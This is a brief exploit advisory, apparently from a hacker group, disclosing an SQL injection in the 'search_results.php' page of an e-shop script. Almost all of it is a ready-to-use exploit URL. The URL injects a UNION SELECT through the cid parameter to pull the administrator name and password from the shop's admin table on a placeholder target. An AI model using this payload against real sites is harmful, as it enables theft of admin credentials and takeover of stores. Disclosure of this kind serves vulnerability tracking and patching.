E-Php Scripts Eshop 'search_results.php' SQL Injection Vulnerability                                                                  
#############################################                                                                                         
                                                                                                                                      
Dicovered By:            SaiedHacker                                                                                                  
Group:            HackeranShiraz Security Team                                                                                        
Web Address:           www.HackeranShiraz.Com                                                                                         
E-mail:            SaiedHackerIran@Yahoo.com                                                                                          
                                                                                                                                      
#############################################                                                                                         
Exploit:                                                                                                                              
http://Target/eshop/search_results.php?cid=-10%20union%20select%200,concat(es_admin_name,0x3a,es_pwd),2,3,4,5%20from%20eshp_admin